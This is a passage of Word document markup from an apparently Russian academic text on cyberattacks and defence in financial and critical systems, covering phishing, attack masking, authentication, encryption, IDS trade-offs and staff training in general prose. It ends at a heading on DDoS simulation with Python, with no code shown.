                <w:bCs/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Симуляционные</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6873C3A8" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Реализм, обучение персонала</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C25EB35" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Высокие затраты, риски</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15BD2EAB" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Тестирование на практике</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="361D8D0D" w14:textId="53AA8C0E" w:rsidR="0050626B" w:rsidRDefault="0050626B" w:rsidP="00520A08">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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Схема</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF35DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0050626B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF35DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>–Краткое с</w:t>
      </w:r>
      <w:r w:rsidRPr="00172489">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">равнение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">основных </w:t>
      </w:r>
      <w:r w:rsidRPr="00172489">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>моделей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> кибератаки в настоящее время</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768FC955" w14:textId="4196CF72" w:rsidR="0046024C" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B17FC3" w14:textId="397F2C3D" w:rsidR="00E7264E" w:rsidRPr="00533A78" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ГЛАВА V. ПРИМЕРЫ АТАК И ЗАЩИТЫ В КРИТИЧЕСКИХ СИСТЕМАХ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD4AFA" w14:textId="5BC73CA3" w:rsidR="00533A78" w:rsidRPr="008011DB" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.1. Пример атаки на банковскую систему</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21024FFF" w14:textId="640CA7BB" w:rsidR="00533A78" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Атаки на финансовые учреждения, такие как банковские системы, могут принимать различные формы, включая как прямое вмешательство в транзакционные процессы, так и скрытую манипуляцию с данными клиентов. Одним из наиболее распространенных способов нападения является компрометация SCADA-системы, используемой для контроля за автоматическими процессами в банке, такими как управление банковскими терминалами или внутренними сетями. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B6366D" w14:textId="6EC0BF83" w:rsidR="00533A78" w:rsidRDefault="00533A78" w:rsidP="00533A78">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="737FF235" wp14:editId="3BD57624">
            <wp:extent cx="4923692" cy="3618741"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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4570" b="3598"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4970061" cy="3652821"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C03477" w14:textId="69729828" w:rsidR="00533A78" w:rsidRPr="00533A78" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Р</w:t>
      </w:r>
      <w:r w:rsidR="000262BB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ис. 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B12A09">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Диаграмма </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>проведения атаки на банк, состоящей из пяти шагов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8517AB" w14:textId="063A85AC" w:rsidR="00533A78" w:rsidRDefault="008011DB" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Злоумышленники могут использовать уязвимости в SCADA-системах для получения доступа к внутренней сети банка, что дает им возможность манипулировать операциями, запускать атаки типа "человек посередине" или вмешиваться в транзакции. Одним из наиболее популярных методов, используемых в этом контексте, является фишинг. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Так же они </w:t>
      </w:r>
      <w:r w:rsidR="00533A78" w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">могут создать фальшивые страницы для сбора учетных данных сотрудников банка или их клиентов. Используя фишинг, атакующие могут убедить сотрудников банка или клиентов ввести свои логины и пароли на поддельных страницах, что позволяет им получить доступ к важной информации. В результате атаки злоумышленники могут похитить деньги, переписывать данные клиентов или даже блокировать доступ к системе, нарушая нормальную работу банка. Этот пример атак на банковскую систему подчеркивает важность мониторинга, многоуровневой аутентификации и шифрования данных, а также необходимость повышения осведомленности среди сотрудников относительно угроз фишинга и социальных инженерий. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F80F0" w14:textId="77777777" w:rsidR="00533A78" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CCBC34" w14:textId="12C469D8" w:rsidR="00533A78" w:rsidRPr="00C31F51" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31F51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.2. Стратегии защиты при атаке на финансовые системы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4751F8DA" w14:textId="77777777" w:rsidR="00935626" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Для защиты финансовых систем применяются многоуровневые стратегии, которые направлены на предотвращение атак с разных фронтов. Один из наиболее эффективных методов защиты — это многослойная аутентификация, включающая не только стандартные логин и пароль, но и дополнительные способы идентификации, такие как биометрические данные или одноразовые пароли, отправляемые на мобильные устройства. Этот подход значительно усложняет процесс несанкционированного доступа, даже если злоумышленник получит доступ к учетным данным. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6019A636" w14:textId="530A5E2D" w:rsidR="00784E76" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Кроме того, защита данных в финансовых системах требует использования надежного шифрования. Шифрование данных на всех уровнях, включая хранение данных, передаваемые транзакции и резервные копии, предотвращает перехват конфиденциальной информации и ее использование без разрешения. Даже в случае утечки данных, они будут зашифрованы и бесполезны без ключа для расшифровки. Мониторинг и обнаружение аномальных действий являются неотъемлемой частью стратегии защиты финансовых систем. Системы мониторинга позволяют отслеживать транзакции и другие действия в реальном времени, что помогает быстро выявить любые отклонения от нормы. Такие системы могут автоматически оповещать администраторов о подозрительной активности, например, если большое количество транзакций выполняется с одного аккаунта за короткий период времени или если действия противоречат нормам поведения для данного пользователя. Эти мероприятия помогают оперативно реагировать на угрозы и минимизировать ущерб. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFC7F7" w14:textId="77777777" w:rsidR="00784E76" w:rsidRDefault="00784E76" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089B5406" w14:textId="49F31D81" w:rsidR="00784E76" w:rsidRPr="00C31F51" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31F51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>5.3. Маскировка атак и скрытые угрозы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C69DB" w14:textId="77777777" w:rsidR="00784E76" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Одним из методов, который часто используется злоумышленниками, является маскировка своих действий и скрытие следов атаки. Это может быть сделано с помощью различных технологий, таких как использование скомпрометированных узлов или серверов для дальнейших атак. Злоумышленники могут захватывать компьютеры, серверы или устройства в сети и использовать их как "зомби", через которые будет осуществляться дальнейшее заражение и атака. Это позволяет скрыть настоящую точку входа в систему, и для обнаружения атаки требуется более сложный анализ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F76F7B" w14:textId="6AC38118" w:rsidR="00784E76" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В некоторых случаях злоумышленники используют методики, называемые "лонг-ливинг атаки" (long-living attacks), при которых атакующие остаются незамеченными в системе на протяжении длительного времени, маскируя свою активность и вмешиваясь в системы шаг за шагом, без значительного изменения работы системы. Такой подход особенно опасен, поскольку атакующие могут совершать свои действия в фоновом режиме, в то время как </w:t>
      </w:r>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">система продолжает функционировать нормально для пользователей, что затрудняет обнаружение угрозы. Чтобы эффективно бороться с такими угрозами, важно внедрять систему мониторинга, способную анализировать не только очевидные угрозы, но и более сложные и скрытые атаки. Такие инструменты должны включать в себя анализ поведения и отклонений от нормальной работы системы, что позволяет быстро идентифицировать скрытые угрозы и нейтрализовать их до того, как они приведут к серьезным последствиям. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3D712" w14:textId="2BCDB87A" w:rsidR="00784E76" w:rsidRDefault="00784E76" w:rsidP="00784E76">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C5674D" w14:textId="77777777" w:rsidR="009876D8" w:rsidRDefault="009876D8" w:rsidP="009876D8">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A3039D4" wp14:editId="33EFF50E">
            <wp:extent cx="5493740" cy="383857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3492" cy="3859363"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2AF01F" w14:textId="3669A1FE" w:rsidR="009876D8" w:rsidRPr="009876D8" w:rsidRDefault="009876D8" w:rsidP="00520A08">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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF35DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Рис</w:t>
      </w:r>
      <w:r w:rsidR="000262BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF35DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00610624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Анализ последовательности подозрительного сетевого трафика в промышленной системе управления</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FECEB7" w14:textId="77777777" w:rsidR="009876D8" w:rsidRDefault="009876D8" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9FEE08" w14:textId="141D44E2" w:rsidR="00784E76" w:rsidRPr="00C31F51" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31F51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>5.4. Преимущества и недостатки различных методов защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5627C6C6" w14:textId="612F8878" w:rsidR="00784E76" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждый метод защиты в информационных системах имеет свои преимущества и ограничения, и важно правильно сочетать их для создания эффективной системы безопасности. Например, многослойная аутентификация является одним из самых сильных методов защиты, поскольку она требует нескольких факторов для подтверждения личности пользователя. Однако этот метод может быть неудобен для пользователей, особенно если требует дополнительных шагов, таких как использование одноразовых паролей или биометрической идентификации. Также многослойная аутентификация может стать препятствием для пользователей, которым не комфортно использовать дополнительные устройства или приложения. Системы обнаружения вторжений (IDS) могут помочь в </w:t>
      </w:r>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">выявлении попыток несанкционированного доступа в систему. Они анализируют данные о сетевой активности и могут оперативно уведомить администратора о подозрительной активности. Однако IDS требуют значительных вычислительных ресурсов для обработки больших объемов данных и могут давать ложные срабатывания, что увеличивает нагрузку на систему. Также они не могут предотвратить атаку, а только уведомляют о ее наличии, что требует дальнейших действий со стороны специалистов. Шифрование данных — один из самых эффективных методов защиты от утечек информации. Однако оно может привести к определенным затратам на производительность, поскольку для зашифрованных данных требуется больше вычислительных мощностей для их обработки и хранения. Кроме того, если ключи шифрования утрачены или скомпрометированы, данные могут стать недоступными или стать уязвимыми для атак. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7793503D" w14:textId="77777777" w:rsidR="00784E76" w:rsidRDefault="00784E76" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="316DED26" w14:textId="41E85B88" w:rsidR="00784E76" w:rsidRPr="00C31F51" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31F51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>5.5. Обучение персонала и реагирование на угрозы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6AF8CA" w14:textId="7DCD8C6C" w:rsidR="00153D51" w:rsidRDefault="00533A78" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533A78">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Одним из ключевых элементов эффективной системы безопасности является обучение персонала и тренировки по реагированию на угрозы. Обучение сотрудников, как распознавать фишинг-атаки, работать с безопасными паролями и соблюдать другие принципы безопасности, помогает предотвратить многие инциденты, связанные с человеческим фактором. Также важно регулярно проводить тренировки, направленные на отработку действий в случае реальной атаки. Реагирование на угрозы включает в себя не только выявление и предотвращение атак, но и восстановление после инцидента. Планирование действий по восстановлению после атак (Disaster Recovery Plan, DRP) и регулярное тестирование этих планов на практике позволяет убедиться в их эффективности. Важно, чтобы персонал был готов действовать в стрессовых ситуациях и мог оперативно реагировать на возникающие угрозы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190FF73" w14:textId="77777777" w:rsidR="00153D51" w:rsidRDefault="00153D51" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1769CE9C" w14:textId="55BCD4C7" w:rsidR="00153D51" w:rsidRPr="00417456" w:rsidRDefault="00153D51" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00417456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>5.6</w:t>
      </w:r>
      <w:r w:rsidR="00F91A55" w:rsidRPr="00417456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>. Моделирование DDoS-атаки с использованием Python</w:t>
      </w:r>
    </w:p>
